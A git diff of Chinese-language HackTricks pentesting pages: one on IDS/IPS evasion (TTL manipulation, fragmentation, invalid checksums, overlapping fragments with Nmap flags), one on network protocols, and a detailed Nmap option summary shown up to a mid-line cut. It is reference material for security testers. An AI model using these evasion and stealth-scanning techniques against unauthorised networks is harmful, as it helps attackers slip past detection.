-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -# **TTL操纵** +# **TTL 操纵** -发送一些具有足够TTL以到达IDS/IPS但不足以到达最终系统的数据包。然后,发送另一个具有与其他数据包相同序列的数据包,以便IPS/IDS会认为它们是重复的并不会检查它们,但实际上它们携带了恶意内容。 +发送一些 TTL 足以到达 IDS/IPS 的数据包,但不足以到达最终系统。然后,发送另一些具有与其他数据包相同序列的数据包,这样 IPS/IDS 将认为它们是重复的并不会检查它们,但实际上它们携带了恶意内容。 -**Nmap选项:** `--ttlvalue ` +**Nmap 选项:** `--ttlvalue ` # 避免签名 -只需向数据包添加垃圾数据,以避免IPS/IDS签名。 +只需向数据包添加垃圾数据,以避免 IPS/IDS 签名。 -**Nmap选项:** `--data-length 25` +**Nmap 选项:** `--data-length 25` # **分段数据包** -只需分段数据包并发送它们。如果IDS/IPS无法重新组装它们,它们将到达最终主机。 +只需分段数据包并发送它们。如果 IDS/IPS 无法重新组装它们,它们将到达最终主机。 -**Nmap选项:** `-f` +**Nmap 选项:** `-f` # **无效** _**校验和**_ -传感器通常不会计算校验和以提高性能。因此,攻击者可以发送一个数据包,该数据包将被传感器解释但被最终主机拒绝。示例: +传感器通常不会计算校验和以提高性能。因此,攻击者可以发送一个数据包,该数据包将被传感器解释但被最终主机拒绝。例如: -发送一个带有RST标志和无效校验和的数据包,因此,IPS/IDS可能会认为此数据包将关闭连接,但最终主机将丢弃该数据包,因为校验和无效。 +发送一个带有 RST 标志和无效校验和的数据包,因此,IPS/IDS 可能会认为此数据包将关闭连接,但最终主机将丢弃该数据包,因为校验和无效。 -# **不常见的IP和TCP选项** +# **不常见的 IP 和 TCP 选项** -传感器可能会忽略在IP和TCP头中设置的某些标志和选项的数据包,而目标主机在接收后接受该数据包。 +传感器可能会忽略在 IP 和 TCP 标头中设置的某些标志和选项的数据包,而目标主机在接收后接受该数据包。 # **重叠** -当您分段数据包时,可能存在某种重叠(也许数据包2的前8个字节与数据包1的最后8个字节重叠,数据包2的最后8个字节与数据包3的前8个字节重叠)。然后,如果IDS/IPS以与最终主机不同的方式重新组装它们,将解释为不同的数据包。\ +当您分段数据包时,可能存在某种重叠(也许数据包 2 的前 8 个字节与数据包 1 的最后 8 个字节重叠,数据包 2 的最后 8 个字节与数据包 3 的前 8 个字节重叠)。然后,如果 IDS/IPS 以与最终主机不同的方式重新组装它们,将解释为不同的数据包。\ 或者,也许,两个具有相同偏移量的数据包到达,主机必须决定采用哪一个。 -* **BSD**:它偏好具有较小**偏移量**的数据包。对于具有相同偏移量的数据包,它将选择第一个数据包。 -* **Linux**:与BSD类似,但它更喜欢具有相同偏移量的最后一个数据包。 -* **First**(Windows):来的第一个值,就是留下的值。 -* **Last**(思科):来的最后一个值,就是留下的值。 +* **BSD**: 偏好具有较小 _偏移量_ 的数据包。对于具有相同偏移量的数据包,它将选择第一个数据包。 +* **Linux**: 类似于 BSD,但它更喜欢具有相同偏移量的最后一个数据包。 +* **First** (Windows): 来的第一个值,就是留下的值。 +* **Last** (cisco): 来的最后一个值,就是留下的值。 # 工具 * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index d73965bad..da14608ca 100644 --- a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,75 +1,74 @@ +{% hint style="success" %} +学习和实践 AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践 GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -## 多播DNS(mDNS) +## 多播 DNS (mDNS) -**mDNS**协议旨在在没有专用名称服务器的小型本地网络中进行IP地址解析。它通过在子网内进行多播查询来促使具有指定名称的主机响应其IP地址。然后,子网中的所有设备可以使用此信息更新其mDNS缓存。 +**mDNS** 协议旨在在没有专用名称服务器的小型本地网络中进行 IP 地址解析。它通过在子网内进行多播查询来促使具有指定名称的主机响应其 IP 地址。然后,子网中的所有设备可以使用此信息更新其 mDNS 缓存。 需要注意的关键点: -- **域名放弃**:主机可以通过发送TTL为零的数据包释放其域名。 -- **使用限制**:mDNS通常仅解析以**.local**结尾的名称。在此域中与非mDNS主机的冲突需要进行网络配置调整。 +- **域名放弃**:主机可以通过发送 TTL 为零的数据包来释放其域名。 +- **使用限制**:mDNS 通常仅解析以 **.local** 结尾的名称。在此域中与非 mDNS 主机的冲突需要进行网络配置调整。 - **网络详细信息**: -- 以太网多播MAC地址:IPv4 - `01:00:5E:00:00:FB`,IPv6 - `33:33:00:00:00:FB`。 -- IP地址:IPv4 - `224.0.0.251`,IPv6 - `ff02::fb`。 -- 在UDP端口5353上运行。 -- mDNS查询限于本地网络,不会跨越路由器。 +- 以太网多播 MAC 地址:IPv4 - `01:00:5E:00:00:FB`,IPv6 - `33:33:00:00:00:FB`。 +- IP 地址:IPv4 - `224.0.0.251`,IPv6 - `ff02::fb`。 +- 在 UDP 端口 5353 上运行。 +- mDNS 查询限于本地网络,不会跨路由器。 -## DNS-SD(服务发现) +## DNS-SD (服务发现) -DNS-SD是一种通过查询特定域名(例如,`_printers._tcp.local`)来发现网络上的服务的协议。响应包括所有相关域,例如在此情况下可用的打印机。可以在[此处](http://www.dns-sd.org/ServiceTypes.html)找到服务类型的全面列表。 +DNS-SD 是一种通过查询特定域名(例如 `_printers._tcp.local`)来发现网络上服务的协议。响应包括所有相关域,例如在此情况下可用的打印机。可以在[这里](http://www.dns-sd.org/ServiceTypes.html)找到服务类型的全面列表。 -## SSDP(简单服务发现协议) +## SSDP (简单服务发现协议) -SSDP促进了网络服务的发现,主要由UPnP使用。它是一种使用UDP的基于文本的协议,使用多播寻址。对于IPv4,指定的多播地址是`239.255.255.250`。SSDP的基础是[HTTPU](https://en.wikipedia.org/wiki/HTTPU),这是HTTP的UDP扩展。 +SSDP 促进了网络服务的发现,主要由 UPnP 使用。它是一种基于文本的协议,使用 UDP 在端口 1900 上进行,具有多播寻址。对于 IPv4,指定的多播地址是 `239.255.255.250`。SSDP 的基础是 [HTTPU](https://en.wikipedia.org/wiki/HTTPU),这是用于 UDP 的 HTTP 扩展。 -## 设备的Web服务(WSD) - -连接到网络的设备可以通过Web服务(WSD)识别可用的服务,如打印机。这涉及广播UDP数据包。寻找服务的设备发送请求,而服务提供者宣布其提供的服务。 +## 设备 Web 服务 (WSD) +连接到网络的设备可以通过 Web 服务来识别可用服务,例如打印机。这涉及广播 UDP 数据包。寻找服务的设备发送请求,而服务提供者宣布其提供的服务。 ## OAuth 2.0 - -OAuth 2.0是一种协议,促进了用户信息的安全、选择性共享。例如,它使服务能够从Google访问用户数据而无需多次登录。该过程涉及用户身份验证,用户授权,以及Google生成令牌,允许服务访问指定用户数据。 +OAuth 2.0 是一种协议,促进了用户信息在服务之间的安全、选择性共享。例如,它使服务能够从 Google 访问用户数据而无需多次登录。该过程涉及用户身份验证、用户授权以及 Google 生成令牌,允许服务访问指定用户数据。 ## RADIUS +RADIUS(远程身份验证拨号用户服务)是主要由 ISP 使用的网络访问协议。它支持身份验证、授权和计费。用户凭据由 RADIUS 服务器验证,可能包括网络地址验证以增加安全性。身份验证后,用户获得网络访问,并跟踪其会话详细信息以进行计费和统计目的。 -RADIUS(远程身份验证拨号用户服务)是主要由ISP使用的网络访问协议。它支持身份验证、授权和计费。用户凭据由RADIUS服务器验证,可能包括网络地址验证以增加安全性。身份验证后,用户获得网络访问,并跟踪其会话详细信息以进行计费和统计目的。 +## SMB 和 NetBIOS -## SMB和NetBIOS +### SMB (服务器消息块) +SMB 是用于共享文件、打印机和端口的协议。它直接通过 TCP(端口 445)或通过 TCP 上的 NetBIOS(端口 137、138)运行。这种双重兼容性增强了与各种设备的连接。 -### SMB(服务器消息块) -SMB是用于共享文件、打印机和端口的协议。它直接通过TCP(端口445)或通过TCP上的NetBIOS(端口137、138)运行。这种双重兼容性增强了与各种设备的连接。 +### NetBIOS (网络基本输入/输出系统) +NetBIOS 管理资源共享的网络会话和连接。它支持设备的唯一名称和多个设备的组名称,从而实现定向或广播消息传递。通信可以是无连接的(无确认)或面向连接的(基于会话)。虽然 NetBIOS 传统上在诸如 IPC/IPX 的协议上运行,但它通常在 TCP/IP 上使用。关联的协议 NetBEUI 以其速度而闻名,但由于广播而非常冗长。 -### NetBIOS(网络基本输入/输出系统) -NetBIOS管理资源共享的网络会话和连接。它支持设备的唯一名称和多个设备的组名称,从而实现定向或广播消息传递。通信可以是无连接的(无确认)或面向连接的(基于会话)。虽然NetBIOS传统上在诸如IPC/IPX之类的协议上运行,但它通常在TCP/IP上使用。NetBEUI是一个相关协议,以其速度而闻名,但由于广播而非常冗长。 +## LDAP (轻量级目录访问协议) +LDAP 是一种协议,通过 TCP/IP 实现对目录信息的管理和访问。它支持各种操作来查询和修改目录信息。主要用于访问和维护分布式目录信息服务,允许与设计用于 LDAP 通信的数据库进行交互。 -## LDAP(轻量级目录访问协议) -LDAP是一种协议,允许在TCP/IP上管理和访问目录信息。它支持各种操作来查询和修改目录信息。主要用于访问和维护分布式目录信息服务,允许与设计用于LDAP通信的数据库进行交互。 +## Active Directory (AD) +Active Directory 是一个网络可访问的数据库,包含用户、组、特权和资源等对象,便于对网络实体进行集中管理。AD 将其数据组织成域的分层结构,该结构可以包含服务器、组和用户。子域允许进一步分段,每个子域可能维护自己的服务器和用户基础。这种结构集中管理用户,授予或限制对网络资源的访问。可以进行查询以检索特定信息,例如联系方式,或定位域内的资源,例如打印机。 -## Active Directory(AD) -Active Directory是一个网络可访问的数据库,包含用户、组、特权和资源等对象,便于对网络实体进行集中管理。AD将其数据组织成域的分层结构,可以包含服务器、组和用户。子域允许进一步分段,每个子域可能维护自己的服务器和用户群。这种结构集中管理用户,授予或限制对网络资源的访问。可以进行查询以检索特定信息,如联系方式,或定位域内的资源,如打印机。 +{% hint style="success" %} +学习和实践 AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践 GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index aa842c503..7e95be472 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,18 +1,19 @@ # Nmap 总结(ESP) +{% hint style="success" %} +学习并实践 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并实践 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家) +支持 HackTricks -支持 HackTricks 的其他方式: - -- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) -- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
@@ -36,12 +37,12 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 * **`-Pn`**: 无ping。如果您知道它们都是活动的(否则,您可能会浪费很多时间,但此选项也会产生虚假负面结果,表示它们不活动),它可以防止发现阶段。 * **`-sn`** : 无端口扫描。完成侦察阶段后,不扫描端口。相对隐蔽,允许进行小范围网络扫描。具有特权时,发送一个ACK(-PA)到80端口,一个SYN(-PS)到443端口,以及一个回显请求和一个时间戳请求,没有特权时总是完成连接。如果目标是网络,则仅使用ARP(-PR)。如果与另一个选项一起使用,则仅丢弃另一个选项的数据包。 * **`-PR`**: ARP Ping。在分析我们网络中的计算机时,默认使用它,比使用ping更快。如果不想使用ARP数据包,请使用 `--send-ip`。 -* **`-PS `**: 发送SYN数据包,如果回答SYN/ACK则为开放(回答RST以避免结束连接),如果回答RST则为关闭,如果不回答则为不可达。如果没有特权,则自动使用完整连接。如果未指定端口,则默认为80端口。 -* **`-PA `**: 与前一个类似,但使用ACK,结合两者效果更好。 -* **`-PU `**: 目标相反,发送到预计关闭的端口。一些防火墙仅检查TCP连接。如果关闭,则回答端口不可达,如果回答其他ICMP或不回答,则保持为目标不可达。 +* **`-PS `**: 发送SYN数据包,如果回答SYN/ACK则为开放(回答RST以避免结束连接),如果回答RST则为关闭,如果不回答则为不可达。如果没有特权,将自动使用完整连接。如果未指定端口,则默认为80端口。 +* **`-PA `**: 与前一个类似,但使用ACK,结合两者可以获得更好的结果。 +* **`-PU `**: 目标相反,发送到预计关闭的端口。某些防火墙仅检查TCP连接。如果关闭,则回答端口不可达,如果回答其他ICMP或不回答,则保持为目标不可达。 * **`-PE, -PP, -PM`** : ICMP PINGS: 回显回复,时间戳和地址掩码。用于确定目标是否活动。 -* **`-PY`**: 默认发送SCTP INIT探测到80端口,INIT-ACK(开放)或ABORT(关闭)或无回应或ICMP不可达(不活动)可能会回复。 -* **`-PO `**: 在标头中指定协议,默认为1(ICMP),2(IGMP)和4(Encap IP)。对于ICMP、IGMP、TCP(6)和UDP(17)协议,发送协议标头,对于其余协议仅发送IP标头。目的是通过标头的畸形,回答协议不可达或相同协议的响应,以了解其是否在线。 +* **`-PY`**: 默认发送SCTP INIT探测到80端口,INIT-ACK(开放)或ABORT(关闭)或无响应或ICMP不可达(不活动)可能会回复。 +* **`-PO `**: 在标头中指定协议,默认为1(ICMP),2(IGMP)和4(Encap IP)。对于ICMP、IGMP、TCP(6)和UDP(17)协议,发送协议标头,对于其余协议仅发送IP标头。目的是通过标头的畸形,回答协议不可达或相同协议的响应,以了解目标是否活动。 * **`-n`**: 无DNS * **`-R`**: 始终DNS @@ -49,20 +50,20 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 * **`-sS`**: 不完成连接,因此不留下痕迹,如果可以使用非常好(特权)。默认使用此选项。 * **`-sT`**: 完成连接,因此会留下痕迹,但可以确保使用。默认情况下无需特权。 -* **`-sU`**: 较慢,用于UDP。主要用于:DNS(53), SNMP(161,162), DHCP(67和68), (-sU53,161,162,67,68): 开放(回复),关闭(端口不可达),过滤(其他ICMP),开放/过滤(无回应)。对于开放/过滤,-sV发送大量请求以检测nmap支持的任何版本,并可以检测真实状态。这会大大增加时间。 -* **`-sY`**: SCTP协议无法建立连接,因此没有日志,类似于 -PY -* **`-sN,-sX,-sF`:** Null, Fin, Xmas,可以穿透一些防火墙并提取信息。基于符合标准的机器应该用RST回复所有没有SYN、RST或ACK标志的请求:开放/过滤(无回应),关闭(RST),过滤(ICMP不可达)。在Windows、CIsco、BSDI和OS/400上不可靠。在Unix上是的。 +* **`-sU`**: 较慢,用于UDP。主要用于:DNS(53), SNMP(161,162), DHCP(67和68), (-sU53,161,162,67,68): 开放(回复),关闭(端口不可达),过滤(其他ICMP),开放/过滤(无响应)。对于开放/过滤,-sV发送大量请求以检测nmap支持的任何版本,并可以检测真实状态。这会大大增加时间。 +* **`-sY`**: SCTP协议无法建立连接,因此没有日志,类似于-PY +* **`-sN,-sX,-sF`:** Null, Fin, Xmas,可以穿透一些防火墙并提取信息。基于符合标准的机器应该用RST回复所有没有SYN、RST或ACK标志的请求:开放/过滤(无响应),关闭(RST),过滤(ICMP不可达)。在Windows、CIsco、BSDI和OS/400上不可靠。在Unix上是可靠的。 * **`-sM`**: Maimon扫描:发送FIN和ACK标志,用于BSD,目前将所有返回为关闭。 -* **`-sA, sW`**: ACK和Window,用于检测防火墙,了解端口是否被过滤。-sW可以区分开放/关闭,因为开放的会用不同的窗口值回复:开放(带有非0窗口的RST),关闭(RST窗口=0),过滤(ICMP不可达或无回应)。并非所有计算机都按此方式工作,因此如果全部关闭,则不起作用,如果有一些开放,则正常工作,如果有许多开放和少数关闭,则工作方式相反。 -* **`-sI`:** 空闲扫描。对于存在主动防火墙但我们知道它不会过滤到某个IP的情况(或者当我们只是想要匿名时),我们可以使用僵尸扫描器(适用于所有端口),寻找可能的僵尸主机,我们可以使用脚本ipidseq或exploit auxiliary/scanner/ip/ipidseq。此扫描器基于IP数据包的IPID编号。 -* **`--badsum`:** 发送错误的校验和,计算机会丢弃数据包,但防火墙可能会回复,用于检测防火墙。 -* **`-sZ`:** “奇怪”的SCTP扫描器,通过发送带有cookie回显片段的探测,如果开放则应该被丢弃,如果关闭则应该回复ABORT。可以穿过init无法穿过的防火墙,不好的是它无法区分过滤和开放。 -* **`-sO`:** 协议IP扫描。发送错误和空标头,有时甚至无法区分协议。如果到达ICMP不可达协议,则为关闭,如果到达不可达端口,则为开放,如果到达其他错误,则为过滤,如果没有到达任何内容,则为开放|过滤。 -* **`-b `:** FTPhost--> 用于从另一台主机扫描主机,通过连接另一台机器的ftp,并要求其向您要扫描的端口发送文件,根据回复我们将知道它们是否开放。 \[\:\@]\\[:\] 几乎所有ftp服务器现在不允许您这样做,因此实用性不大。 +* **`-sA, sW`**: ACK和Window,用于检测防火墙,了解端口是否被过滤。-sW可以区分开放/关闭,因为开放的端口会用不同的窗口值回复:开放(带有非0窗口的RST),关闭(窗口=0的RST),过滤(ICMP不可达或无响应)。并非所有计算机都按此方式工作,因此如果全部关闭,则不起作用,如果有一些开放,则正常工作,如果有许多开放和少数关闭,则反向工作。 +* **`-sI`:** 空闲扫描。对于存在主动防火墙但我们知道它不会过滤到某个IP的情况(或者当我们只是想要匿名时),我们可以使用僵尸扫描器(适用于所有端口),要查找可能的僵尸,我们可以使用脚本ipidseq或exploit auxiliary/scanner/ip/ipidseq。此扫描器基于IP数据包的IPID编号。 +* **`--badsum`:** 发送错误的校验和,计算机将丢弃数据包,但防火墙可能会回复,用于检测防火墙。 +* **`-sZ`:** “奇怪”的SCTP扫描器,通过发送带有cookie回显片段的探测,如果开放则应该被丢弃,如果关闭则应该回复ABORT。可以通过无法通过init的防火墙,不好的是它不能区分过滤和开放。 +* **`-sO`:** 协议IP扫描。发送错误和空标头,有时甚至无法区分协议。如果收到ICMP不可达协议,则为关闭,如果收到不可达端口,则为开放,如果收到其他错误,则为过滤,如果没有收到任何内容,则为开放|过滤。 +* **`-b `:** FTPhost--> 用于从另一台主机扫描主机,通过连接另一台机器的ftp,并要求其向您要扫描的端口发送文件,根据答复我们将知道它们是否开放。 \[\:\@]\\[:\] 几乎所有ftp服务器现在不允许您这样做,因此实用性很小。 -### **中心化分析** +### **集中分析** -**-p:** 用于指定要扫描的端口。要选择65335个端口:**-p-** 或 **-p all**。Nmap根据其流行度有内部分类。默认使用前1000个主要端口。使用 **-F**(快速扫描)分析前100个主要端口。使用 **--top-ports \** 分析指定数量的主要端口(从1到65335)。按随机顺序检查端口,为了避免这种情况,使用 **-r**。还可以选择端口范围:20-30,80,443,1024- 这表示查看1024之后的端口。还可以按协议分组端口:U:53,T:21-25,80,139,S:9。还可以选择nmap中常用端口范围内的范围:-p \[-1024] 分析nmap-services中包含的端口直到1024。**--port-ratio \** 分析常见端口,比率必须介于0和1之间。 +**-p:** 用于指定要扫描的端口。要选择65335个端口:**-p-** 或 **-p all**。Nmap根据其流行度有内部分类。默认使用前1000个主要端口。使用 **-F**(快速扫描)分析前100个主要端口。使用 **--top-ports \** 分析指定数量的主要端口(从1到65335)。按随机顺序检查端口,为了避免这种情况,使用 **-r**。还可以选择端口范围:20-30,80,443,1024- 这表示从1024开始查看。还可以按协议分组端口:U:53,T:21-25,80,139,S:9。还可以选择nmap中常用端口范围内的范围:-p \[-1024] 分析nmap-services中包含的端口直到1024。**--port-ratio \** 分析常见端口,比率必须介于0和1之间。 **-sV** 版本扫描,可以调整强度从0到9,默认为7。 @@ -87,7 +88,7 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 * **External:** 用于使用外部资源的脚本 * **Intrusive:** 使用被认为对受害者或目标具有侵入性的脚本 * **Malware:** 检查是否存在恶意代码或后门打开的连接 -* **Safe:** 运行不具有侵入性的脚本 +* **Safe:** 运行非侵入性脚本 * **Vuln:** 发现最常见的漏洞 * **All:** 运行所有可用的NSE扩展脚本 @@ -113,19 +114,19 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 \--script-updatedb -**要使用单个脚本,只需输入:nmap --script ScriptName target** --> 输入脚本将同时运行脚本和扫描程序,因此也可以添加扫描程序选项,可以添加 **“safe=1”** 以仅运行安全脚本。 +**要使用单个脚本,只需输入:nmap --script ScriptName target** --> 输入脚本将同时运行脚本和扫描器,因此也可以添加扫描器选项,可以添加 **“safe=1”** 以仅运行安全脚本。 **时间控制** -**Nmap可以调整时间单位为秒、分钟、毫秒:** --host-timeout 参数 900000ms、900、900s 和 15m 都是相同的。 +**Nmap可以调整时间单位为秒、分钟、毫秒:** --host-timeout arguments 900000ms, 900, 900s, and 15m 都是相同的。 -Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,直到所有组都被分析完毕,才会转移到下一个块(用户在块被分析之前也不会收到任何更新),这样,对于nmap来说,使用大组更为高效。默认情况下,在C类中使用256。 +Nmap将要扫描的主机总数分成组,并以块的形式分析这些组,直到所有组都被分析完毕,才会转移到下一个块(用户也不会在分析块之前收到任何更新),这样,对于nmap来说使用大组更为高效。默认情况下,在C类中使用256。 可以使用\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_(调整并行扫描组大小) 可以控制并行扫描器的数量,但最好不要这样做(nmap已根据网络状态自动进行控制):**--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ -可以修改 rtt 超时时间,但通常不需要:**--min-rtt-timeout** _**\